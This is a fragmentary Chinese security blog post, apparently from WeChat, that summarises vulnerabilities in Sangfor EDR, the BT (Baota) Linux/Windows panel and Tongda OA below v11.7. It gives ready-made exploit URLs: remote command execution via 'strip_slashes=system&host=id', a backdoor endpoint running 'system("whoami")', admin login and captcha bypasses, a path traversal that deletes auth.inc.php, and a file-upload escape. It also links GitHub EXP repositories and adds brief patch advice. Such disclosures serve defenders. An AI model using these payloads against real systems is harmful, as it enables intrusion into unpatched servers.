RCE getshell
http://ip/tool/log/c.php?strip_slashes=system&host=id
strip_slashes=system&host=id
真•后门
http://ip/php_cli.php?code=system("whoami");
神奇备份
越权登陆
http://ip/ui/login.php?user=admin
迷惑验证码
http://ip/l.php?captcha=10899801
权限绕过
https://mp.weixin.qq.com/s/4Z4QF-Wdq2PhqCkGKB8Q6Q
某信服小结
某信服EDR所有的漏洞当然不止以上几个,在tool目录下几乎无一例外的都有变量覆盖漏洞,也希望相关开发人员能够重视安全开发规范,我认为漏洞产生的原因就是开发没有做到数据与代码分离从而致使可以控制变量并加以利用,现在大部分漏洞已经有了相应的解决方案。大部分的EDR已经删除了tool目录,并且也发布了相应的补丁,虽然发补丁时顺道把源码泄露了,EXP已经上传至github有兴趣的小伙伴可以自行下载。
https://github.com/wikiZ/-EDR-EXP
http://ip:888/pma
该漏洞主要影响版本有:
宝塔linux面板 7.4.2
宝塔windows面板6.8
1、升级宝塔面板至最新版本7.4.3,在面板内即可升级。
2、关闭888端口。
EXP地址:https://github.com/wikiZ/pagota
通达OA < v11.7
/module/appbuilder/assets/print.php
P.S.注意通达OA的源码是加密的需要使用seayDZend工具解密后即可正常阅读源码
http://ip/module/appbuilder/assets/print.phpguid=../../../webroot/inc/auth.inc.php
删除了auth.inc.php文件,我们继续分析文件上传点的源码,漏洞发生位置为:
/general/data_center/utils/upload.php
这里的逃逸操作,使其进入if条件中拷贝文件至网站根目录。
http://ip/_filename.php
即可。数据包如下图:
通达OA漏洞小结
更新至最新版本v11.7即可。
更新地址:https://www.tongda2000.com/download/sp2019.php
- End -
精彩推荐
Go二进制文件逆向分析从基础到进阶——综述
利用 ZoomEye 追踪多种 Redteam C&C 后渗透攻击框架
七夕节网安男孩自我保护指南
蔓灵花(BITTER)一个新版本的Loader分析
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论